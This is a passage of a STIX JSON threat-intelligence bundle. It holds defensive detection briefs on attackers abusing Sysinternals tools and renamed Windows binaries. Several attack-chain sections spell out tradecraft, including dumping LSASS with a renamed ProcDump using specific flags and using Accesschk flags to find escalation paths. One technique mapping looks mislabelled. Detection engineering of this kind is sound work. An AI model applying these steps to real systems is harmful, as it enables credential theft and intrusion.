      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8b3fe58a-d13d-520f-a71f-cb4ebaa1df25",
      "target_ref": "attack-pattern--5ef49edb-94d7-5032-9ce1-22d917ae63a7"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e36dde55-a247-51ae-915b-0aac12302837",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Network Service Discovery",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1046",
          "url": "https://attack.mitre.org/techniques/T1046"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d29b2568-dbcc-550f-9579-7db792c8a2d6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8b3fe58a-d13d-520f-a71f-cb4ebaa1df25",
      "target_ref": "attack-pattern--e36dde55-a247-51ae-915b-0aac12302837"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Impair Defenses",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1562",
          "url": "https://attack.mitre.org/techniques/T1562"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--717f312e-8487-5580-b2a1-6df43e717617",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8b3fe58a-d13d-520f-a71f-cb4ebaa1df25",
      "target_ref": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Service Stop",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c104472f-cd6c-5d7d-bbb1-f3aa0c8f3cb6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8b3fe58a-d13d-520f-a71f-cb4ebaa1df25",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--8b3fe58a-d13d-520f-a71f-cb4ebaa1df25",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Abuse of Microsoft Sysinternals PsSuspend Utility",
      "description": "## Overview\n\nThe Microsoft Sysinternals PsSuspend utility, a legitimate command-line tool, allows administrators to suspend and resume processes on local or remote Windows systems. While designed for troubleshooting and system management, its capabilities can be abused by threat actors to halt critical security software, database services, or other essential applications, thereby disrupting operations or facilitating malicious activities like data exfiltration or ransomware deployment. This brief focuses on the detection of PsSuspend's execution as an indicator of potential abuse. The source material does not detail a specific attack campaign or actor, but highlights the tool's potential for misuse within a broader attack chain to achieve objectives like evasion, persistence, or denial of service.\n\n## Impact\n\nThe successful abuse of PsSuspend can lead to significant operational disruption and security breaches. By suspending essential processes, attackers can disable endpoint detection and response (EDR) agents, anti-virus software, and other security controls, allowing them to operate undetected. It can also be used to pause critical business applications, leading to denial of service, data inconsistencies, or creating windows of opportunity for data exfiltration before legitimate processes can react. The impact could range from temporary service outages to complete system compromise if security tools are effectively bypassed.\n\n## Recommendation\n\n*   Enable process creation logging (e.g., via Sysmon) on all Windows endpoints to ensure the `process_creation` log source is available.\n*   Deploy the \"Sysinternals PsSuspend Execution\" Sigma rule to your SIEM for detecting PsSuspend usage.\n*   Monitor for process suspensions that are not part of approved administrative tasks.\n*   Implement application whitelisting or strict controls over the execution of Sysinternals tools on sensitive systems.\n",
      "published": "2026-07-03T14:28:11Z",
      "labels": [
        "sysinternals",
        "living-off-the-land",
        "process-manipulation",
        "windows",
        "tool-abuse"
      ],
      "object_refs": [
        "attack-pattern--5ef49edb-94d7-5032-9ce1-22d917ae63a7",
        "attack-pattern--e36dde55-a247-51ae-915b-0aac12302837",
        "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://learn.microsoft.com/en-us/sysinternals/downloads/pssuspend"
        },
        {
          "source_name": "reference",
          "url": "https://twitter.com/0gtweet/status/1638069413717975046"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/SigmaHQ/sigma/blob/main/rules/windows/process_creation/proc_creation_win_sysinternals_pssuspend_execution.yml"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--6587be55-e832-5b06-9b3b-4af4604cd32b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Create or Modify System Process",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1543",
          "url": "https://attack.mitre.org/techniques/T1543"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1b0c9fed-4d9a-56cf-811a-00bd1a801652",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d1030083-7749-5732-b6db-53a13a184f1d",
      "target_ref": "attack-pattern--6587be55-e832-5b06-9b3b-4af4604cd32b"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--01b0e09b-1506-5d2d-8ffa-f7854bbc1154",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Account Discovery",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1087",
          "url": "https://attack.mitre.org/techniques/T1087"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2b84c6a0-aa9d-5684-9057-bf895bcaad27",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d1030083-7749-5732-b6db-53a13a184f1d",
      "target_ref": "attack-pattern--01b0e09b-1506-5d2d-8ffa-f7854bbc1154"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--d1030083-7749-5732-b6db-53a13a184f1d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Detection of Sysinternals PsService Execution",
      "description": "## Overview\n\nSysinternals PsService is a command-line utility for Windows systems that allows users, typically administrators, to view and control services. While a legitimate tool for system management, it can be leveraged by malicious actors post-compromise for various nefarious activities. Threat actors can use PsService to enumerate running services for discovery (TA0007), stop critical services to disrupt operations, start malicious services for persistence (TA0003), or modify service configurations to achieve privilege escalation (TA0004). The execution of this tool, especially from unusual directories or by non-administrative accounts, is a strong indicator of potential malicious activity. Defenders should be aware of its legitimate uses versus its potential for abuse in the hands of an attacker to identify anomalous behavior.\n\n## Attack Chain\n\nThis detection brief focuses on the execution of a specific tool, Sysinternals PsService, which can be used at various stages of an attack. The source material does not provide a full, observed attack chain from initial access to impact. Therefore, this section is omitted as per quality requirements.\n\n## Impact\n\nThe abuse of Sysinternals PsService can lead to significant impact depending on how an attacker utilizes it. If used for reconnaissance, it facilitates further lateral movement or targeting of critical systems. If used to stop or disable essential services, it can cause severe disruption to business operations, leading to downtime and data loss. Modifying services can grant attackers elevated privileges, allowing them to install persistent backdoors or execute arbitrary code with SYSTEM rights, compromising the integrity and confidentiality of the affected system and potentially the entire network.\n\n## Recommendation\n\n*   Deploy the provided \"Sysinternals PsService Execution\" Sigma rule to your SIEM solution to detect instances of `PsService.exe` execution.\n*   Enable process creation logging, such as via Sysmon, to ensure the necessary `Image` and `OriginalFileName` fields are captured for the Sigma rule.\n*   Investigate alerts from the \"Sysinternals PsService Execution\" rule, paying close attention to the parent process, command-line arguments, and the user context of the execution.\n*   Review legitimate uses of PsService within your environment and consider whitelisting known legitimate execution paths or users if false positives occur, as highlighted in the rule's `falsepositives` field.\n",
      "published": "2026-07-03T14:27:18Z",
      "labels": [
        "sysinternals",
        "process-execution",
        "service-manipulation",
        "windows"
      ],
      "object_refs": [
        "attack-pattern--6587be55-e832-5b06-9b3b-4af4604cd32b",
        "attack-pattern--01b0e09b-1506-5d2d-8ffa-f7854bbc1154"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://learn.microsoft.com/en-us/sysinternals/downloads/psservice"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/SigmaHQ/sigma/blob/main/rules/windows/process_creation/proc_creation_win_sysinternals_psservice.yml"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--633c0a79-a71b-5eb7-9eca-504796091337",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "OS Credential Dumping",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1003",
          "url": "https://attack.mitre.org/techniques/T1003"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c2373abe-9459-575e-99d4-83db4afc0b2e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8bb31307-ca8c-544b-8da4-6c7c8d207301",
      "target_ref": "attack-pattern--633c0a79-a71b-5eb7-9eca-504796091337"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--8bb31307-ca8c-544b-8da4-6c7c8d207301",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Procdump Execution Detection",
      "description": "## Overview\n\nProcdump is a command-line utility from Microsoft's Sysinternals suite, designed primarily for troubleshooting application crashes by generating memory dumps of processes. While a legitimate tool used by developers and system administrators for debugging, it is also widely co-opted by malicious actors. Attackers leverage Procdump to dump the memory of sensitive processes, most notably Local Security Authority Subsystem Service (LSASS), to extract credentials such as NTLM hashes or plaintext passwords. This technique allows adversaries to bypass traditional endpoint security measures that might block direct access to LSASS or other credential-storage mechanisms. Its execution often indicates an attacker has already gained a foothold and is attempting to escalate privileges or move laterally within a compromised Windows environment.\n\n## Impact\n\nThe successful abuse of Procdump can lead to significant compromise. By extracting credentials from processes like LSASS, attackers gain access to legitimate user and administrative account credentials. This enables them to perform lateral movement, access restricted resources, escalate privileges, and maintain persistence within an organization's network. The primary impact is unauthorized access to sensitive data and systems, potentially leading to data exfiltration, system destruction, or deployment of further malicious payloads like ransomware. The ease with which Procdump can be used makes it a popular choice for credential dumping in targeted attacks.\n\n## Recommendation\n\n*   Deploy the Sigma rule \"Detect Procdump Execution\" to your SIEM to alert on the execution of the `procdump.exe` binary.\n*   Investigate all instances of `procdump.exe`, `procdump64.exe`, or `procdump64a.exe` execution, especially if originating from non-standard directories or executed by non-administrative accounts.\n*   Enable Sysmon process creation logging to ensure `process_creation` events for `procdump.exe` are collected and available for analysis by the provided Sigma rule.\n*   Review legitimate use cases for Procdump within your environment and create baselines or whitelisting rules to reduce false positives for authorized debugging activities.\n",
      "published": "2026-07-03T14:25:53Z",
      "labels": [
        "sysinternals",
        "credential-dumping",
        "process-memory",
        "windows"
      ],
      "object_refs": [
        "attack-pattern--633c0a79-a71b-5eb7-9eca-504796091337"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://learn.microsoft.com/en-us/sysinternals/downloads/procdump"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--9784d16a-c518-5b29-909d-468e2fd57dad",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Permission Groups Discovery",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1069",
          "url": "https://attack.mitre.org/techniques/T1069"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5e8a7b7a-af61-5464-9f46-2bef015667e4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--90e48ddf-d9df-5ff1-878d-040c024371d1",
      "target_ref": "attack-pattern--9784d16a-c518-5b29-909d-468e2fd57dad"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--90e48ddf-d9df-5ff1-878d-040c024371d1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Permission Check Via Accesschk.EXE",
      "description": "## Overview\n\nAdversaries are leveraging the legitimate Microsoft Sysinternals utility `Accesschk.exe` to perform reconnaissance and permission checking on compromised Windows systems. This tool, originally designed for system administrators to audit permissions, is a favored binary for threat actors due to its native capabilities and often being pre-trusted by security solutions. Its abuse enables attackers to quickly identify misconfigurations, weak permissions, or unquoted service paths on files, directories, registry keys, services, and processes. This information is crucial for planning subsequent privilege escalation techniques, allowing an attacker to move from a low-privileged foothold to administrative or system-level access, thereby advancing their objectives such as persistence, lateral movement, or data exfiltration.\n\n## Attack Chain\n\n1.  **Initial Compromise**: An attacker gains initial access to a target Windows system, typically through methods like phishing, exploiting a vulnerable service, or compromising credentials.\n2.  **Tool Staging**: The `Accesschk.exe` utility (or its 64-bit variants like `accesschk64.exe`) is transferred to the compromised system, often via existing C2 channels, PowerShell, or embedded within a larger malicious payload.\n3.  **Permission Discovery**: The attacker executes `Accesschk.exe` from a command prompt or script using specific flags such as `uwcqv` (users with write access to services), `kwsu` (kernel objects, services, users), or `uwdqs` (users with write access to directories/shares) to enumerate detailed permissions across various system objects.\n4.  **Output Analysis**: The command output is parsed by the attacker to identify specific misconfigurations or weak access control lists (ACLs) that could be exploited. This might include writable service binaries, DLL hijack paths, or modifiable registry keys.\n5.  **Identify Escalation Paths**: Based on the gathered permission data, the attacker pinpoints viable privilege escalation vectors, such as services configured to run with SYSTEM privileges but having a writable binary path, or registry keys that control critical system functions and are modifiable by low-privileged users.\n6.  **Exploitation Planning**: The attacker formulates a strategy to exploit the identified weaknesses, which could involve replacing legitimate binaries with malicious ones, modifying service parameters, or injecting code into processes to achieve higher privileges.\n7.  **Privilege Escalation**: The attacker executes their chosen method to elevate privileges, often resulting in gaining administrator or SYSTEM-level access on the compromised host.\n8.  **Post-Escalation Actions**: With elevated privileges, the attacker can proceed with further malicious activities, including deploying additional malware, establishing persistence, moving laterally within the network, or exfiltrating sensitive data.\n\n## Impact\n\nSuccessful abuse of `Accesschk.exe` as part of a privilege escalation chain can lead to full system compromise, allowing attackers to gain complete control over the affected Windows machine. This enables them to bypass security controls, install rootkits, steal credentials, deploy ransomware, or exfiltrate critical intellectual property and sensitive data. While `Accesschk.exe` itself doesn't cause direct damage, its role in uncovering vulnerabilities can directly lead to significant security breaches, financial loss, reputational damage, and operational disruption for affected organizations across all sectors.\n\n## Recommendation\n\n*   Deploy the Sigma rule `Permission Check Via Accesschk.EXE` to your SIEM and tune for your environment to detect suspicious usage of this utility.\n*   Ensure Sysmon process creation logging is enabled for all Windows endpoints to capture `Image` and `CommandLine` details necessary for the rule `Permission Check Via Accesschk.EXE`.\n*   Regularly audit permissions on critical system resources and services to identify and remediate misconfigurations that `Accesschk.exe` could reveal to an attacker.\n",
      "published": "2026-07-03T14:25:04Z",
      "labels": [
        "sysinternals",
        "privilege-escalation",
        "tool-abuse",
        "discovery",
        "windows"
      ],
      "object_refs": [
        "attack-pattern--9784d16a-c518-5b29-909d-468e2fd57dad"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/SigmaHQ/sigma/blob/main/rules/windows/process_creation/proc_creation_win_sysinternals_accesschk_check_permissions.yml"
        },
        {
          "source_name": "reference",
          "url": "https://speakerdeck.com/heirhabar/hunting-for-privilege-escalation-in-windows-environment?slide=43"
        },
        {
          "source_name": "reference",
          "url": "https://www.youtube.com/watch?v=JGs-aKf2OtU\u0026ab_channel=OFFZONEMOSCOW"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/gladiatx0r/Powerless/blob/04f553bbc0c65baf4e57344deff84e3f016e6b51/Powerless.bat"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--67193ec2-dec7-586e-a385-cc0f1baa8526",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data Destruction",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1485",
          "url": "https://attack.mitre.org/techniques/T1485"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--54917e1c-759c-5221-a8b7-6a4edc916e93",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--747c2b91-2485-506b-acee-44f0703c5a35",
      "target_ref": "attack-pattern--67193ec2-dec7-586e-a385-cc0f1baa8526"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--fef861e9-3ac4-50b1-aa1a-3ff772ca094e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "T1036",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1036",
          "url": "https://attack.mitre.org/techniques/T1036"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--acdcfe37-2902-529e-81c4-4871b04ebdd6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--747c2b91-2485-506b-acee-44f0703c5a35",
      "target_ref": "attack-pattern--fef861e9-3ac4-50b1-aa1a-3ff772ca094e"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--747c2b91-2485-506b-acee-44f0703c5a35",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Renamed Sysinternals Sdelete Utility Execution",
      "description": "## Overview\n\nThe Microsoft Sysinternals Sdelete utility is a legitimate command-line tool designed to securely delete files and cleanse free space, often used by system administrators for data hygiene. However, adversaries frequently rename legitimate system utilities, including Sdelete (e.g., to `clean.exe` or `eraser.exe`), to evade detection by security products that might allow known binaries to run unchallenged. This tactic is a strong indicator of malicious activity, as legitimate administrators rarely rename such tools for operational use. The detection of a renamed `sdelete.exe` suggests an attacker is likely attempting to perform data destruction (Wiper, Ransomware) or obfuscate their activities on a compromised Windows endpoint. This technique leverages a living-off-the-land binary (LOLBIN) for its destructive capabilities, making it a critical behavior to detect.\n\n## Impact\n\nSuccessful execution of a renamed Sdelete utility can lead to irreversible data destruction across the targeted system, including files, free space, and potentially entire volumes, depending on the parameters used. This directly impacts data availability and system integrity, potentially rendering systems inoperable and causing significant operational disruption. It is a common technique used in the final stages of destructive cyberattacks, such as wiper malware or ransomware (after data exfiltration), aiming to maximize damage or hinder forensic analysis. Organizations could face severe data loss, extended recovery times, and substantial financial costs if such an attack is successful.\n\n## Recommendation\n\n*   Deploy the Sigma rules in this brief to your SIEM and tune for your environment to detect renamed `sdelete.exe` execution.\n*   Enable Sysmon process-creation logging to ensure `OriginalFileName` and `Image` fields are captured for the detection rule.\n*   Investigate any alerts generated by the \"Detect Renamed Sysinternals Sdelete Execution\" rule as they are highly indicative of malicious activity.\n",
      "published": "2026-07-03T14:24:22Z",
      "labels": [
        "data-destruction",
        "living-off-the-land",
        "windows",
        "impact",
        "defense-evasion"
      ],
      "object_refs": [
        "attack-pattern--67193ec2-dec7-586e-a385-cc0f1baa8526",
        "attack-pattern--fef861e9-3ac4-50b1-aa1a-3ff772ca094e"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://learn.microsoft.com/en-us/sysinternals/downloads/sdelete"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--fef861e9-3ac4-50b1-aa1a-3ff772ca094e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Masquerading",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1036",
          "url": "https://attack.mitre.org/techniques/T1036"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ea8f542e-60a4-56e3-ab55-9291febee407",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--611b91eb-242d-57a9-b3c9-d169ab5d3cc9",
      "target_ref": "attack-pattern--fef861e9-3ac4-50b1-aa1a-3ff772ca094e"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--633c0a79-a71b-5eb7-9eca-504796091337",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "OS Credential Dumping",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1003",
          "url": "https://attack.mitre.org/techniques/T1003"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--bba97bcf-9ca9-5314-bbe3-2955c2e45009",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--611b91eb-242d-57a9-b3c9-d169ab5d3cc9",
      "target_ref": "attack-pattern--633c0a79-a71b-5eb7-9eca-504796091337"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--611b91eb-242d-57a9-b3c9-d169ab5d3cc9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Detecting Renamed ProcDump Execution for Evasion",
      "description": "## Overview\n\nThis intelligence brief addresses the technique of executing renamed Sysinternals ProcDump binaries, a common evasion tactic used by sophisticated threat actors. ProcDump, a legitimate utility from Microsoft Sysinternals, is designed to monitor an application for CPU spikes and generate crash dumps. However, adversaries frequently abuse it to dump the Local Security Authority Subsystem Service (LSASS) process memory, which often contains sensitive credential material. By renaming the `procdump.exe` or `procdump64.exe` binary (e.g., to `dump.exe` or `service.exe`), attackers aim to bypass static detections based on file names or hash values, making their activities harder to spot for security defenders. This tactic significantly raises the risk of credential theft, enabling lateral movement and privilege escalation within compromised environments.\n\n## Attack Chain\n\n1.  **Initial Access**: A threat actor gains initial access to a Windows system, often via phishing, exploited vulnerabilities, or RDP brute-forcing.\n2.  **Tool Staging**: The attacker uploads a copy of ProcDump (or another legitimate tool like `comsvcs.dll` for `rundll32.exe` memory dumping) to the compromised system.\n3.  **Renaming for Evasion**: The ProcDump executable is renamed to a seemingly innocuous name (e.g., `dump.exe`, `explorer.exe`, `svchost.exe`, or other names not in the default Sysinternals installation path) to avoid detection by traditional endpoint security solutions that might whitelist or specifically monitor `procdump.exe`.\n4.  **Credential Dumping**: The renamed ProcDump executable is launched via the command line to target the `lsass.exe` process and create a memory dump. Typical command-line arguments include `-ma` for a full memory dump, or `-mp` for mini plus. The `accepteula` flag is often used to suppress the license agreement prompt.\n5.  **Exfiltration**: The generated LSASS memory dump file, which may contain NTLM hashes, Kerberos tickets, or clear-text passwords, is compressed or encrypted and exfiltrated from the network to attacker-controlled infrastructure.\n6.  **Lateral Movement/Privilege Escalation**: The stolen credentials are used for lateral movement to other systems, accessing sensitive resources, or escalating privileges within the compromised environment.\n\n## Impact\n\nSuccessful exploitation of this technique can lead to severe organizational impact, including widespread credential theft and unauthorized access across the enterprise network. Compromised credentials allow threat actors to escalate privileges, move laterally to critical systems, bypass multi-factor authentication (if not properly configured), and gain persistence. This often precedes data exfiltration, deployment of ransomware, or other destructive activities, resulting in significant financial losses, operational disruption, and reputational damage. The pervasive nature of credential abuse makes it a high-priority threat for detection engineers.\n\n## Recommendation\n\n*   Deploy the provided Sigma rule \"Detecting Renamed ProcDump Execution\" to your SIEM to identify suspicious ProcDump activity.\n*   Ensure Sysmon process-creation logging is enabled to provide the necessary `OriginalFileName`, `Image`, and `CommandLine` fields for the detection rule.\n*   Investigate any alerts generated by the rule, especially those involving `OriginalFileName: 'procdump'` where `Image` does not end in `\\procdump.exe`, `\\procdump64.exe`, or `\\procdump64a.exe`.\n*   Implement strong access controls and principle of least privilege to limit the ability of non-administrative accounts to execute or rename tools in sensitive directories.\n*   Regularly review and harden endpoint security configurations to block or alert on the execution of non-standard binaries in unexpected locations.\n",
      "published": "2026-07-03T14:23:37Z",
      "labels": [
        "stealth",
        "credential-dumping",
        "sysinternals",
        "evasion",
        "windows"
      ],
      "object_refs": [
        "attack-pattern--fef861e9-3ac4-50b1-aa1a-3ff772ca094e",
        "attack-pattern--633c0a79-a71b-5eb7-9eca-504796091337"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://learn.microsoft.com/en-us/sysinternals/downloads/procdump"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/SigmaHQ/sigma/blob/main/rules/windows/process_creation/proc_creation_win_renamed_sysinternals_procdump.yml"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--fef861e9-3ac4-50b1-aa1a-3ff772ca094e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Masquerading",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1036",
          "url": "https://attack.mitre.org/techniques/T1036"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a4fedab2-f1dc-57aa-a1fc-849dfc6d1267",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2d8aff88-b3f8-5269-9949-034a2763129d",
      "target_ref": "attack-pattern--fef861e9-3ac4-50b1-aa1a-3ff772ca094e"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--2d8aff88-b3f8-5269-9949-034a2763129d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Potential Defense Evasion Via Rename Of Highly Relevant Binaries",
      "description": "## Overview\n\nThis brief details a common defense evasion technique employed by various threat actors and malware, which involves renaming legitimate Windows system binaries (such as `powershell.exe`, `certutil.exe`, or `rundll32.exe`) to mask their malicious activity. By altering the filename, attackers attempt to bypass security solutions that rely on process names for detection, whitelisting, or behavioral analysis. This technique is crucial for defenders to address as it allows the abuse of trusted processes for malicious ends, enabling subsequent actions like persistence or execution without immediate detection. Detection leverages the `OriginalFileName` field in Sysmon events, which retains the original name of the executable regardless of its current filename, providing a robust way to identify this stealthy behavior. This method has been observed in various campaigns, including ransomware like MegaCortex.\n\n## Attack Chain\n\n1.  **Initial Access**: An attacker gains initial access to a target system through various means (e.g., phishing, exploiting a vulnerability).\n2.  **Staging Malicious Binary**: The attacker transfers or creates a malicious payload or script on the compromised system.\n3.  **Identify Legitimate Binary**: The attacker identifies a legitimate, trusted Windows system binary, such as `powershell.exe`, `certutil.exe`, or `rundll32.exe`, commonly used for system administration.\n4.  **Rename Binary for Evasion**: The attacker copies the legitimate binary and renames the copy to a less suspicious name (e.g., `powershell.exe` renamed to `update.exe` or `svchost.exe`).\n5.  **Execute Renamed Binary**: The attacker executes the renamed binary (e.g., `update.exe`) to carry out malicious operations, such as executing a script, downloading additional payloads, or performing lateral movement.\n6.  **Defense Evasion**: The renamed process runs with the functionality of the original system binary but appears as a different, potentially benign, process name to security tools that do not inspect the `OriginalFileName` metadata.\n7.  **Achieve Objective**: This evasion enables the attacker to achieve their objectives, such as establishing persistence, escalating privileges, exfiltrating data, or deploying ransomware, with a reduced risk of detection.\n\n## Impact\n\nIf this defense evasion technique is successful, attackers can execute powerful system tools under disguise, significantly increasing the likelihood of successful persistence, lateral movement, or data exfiltration without triggering process-name-based security alerts. This can extend an attacker's dwell time and the scope of compromise, as seen in ransomware attacks like MegaCortex which utilized this method to distribute payloads. The ability to masquerade malicious activity under the guise of legitimate processes directly undermines the effectiveness of security monitoring and incident response efforts.\n\n## Recommendation\n\n*   Deploy the provided Sigma rule (`Potential Defense Evasion Via Rename Of Highly Relevant Binaries`) to your SIEM.\n*   Ensure Sysmon is configured to log process creation events (`EventID 1`) including the `OriginalFileName` field, which is critical for the detection rule.\n*   Tune the rule for your environment by analyzing `falsepositives` described in the rule, such as custom applications that rename binaries, and add specific exclusions if necessary.\n*   Prioritize investigation of alerts generated by the `Potential Defense Evasion Via Rename Of Highly Relevant Binaries` rule, as they indicate a strong likelihood of malicious activity.\n",
      "published": "2026-07-03T14:22:48Z",
      "labels": [
        "defense-evasion",
        "windows",
        "process-creation"
      ],
      "object_refs": [
        "attack-pattern--fef861e9-3ac4-50b1-aa1a-3ff772ca094e"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://mgreen27.github.io/posts/2019/05/12/BinaryRename.html"
        },
        {
          "source_name": "reference",
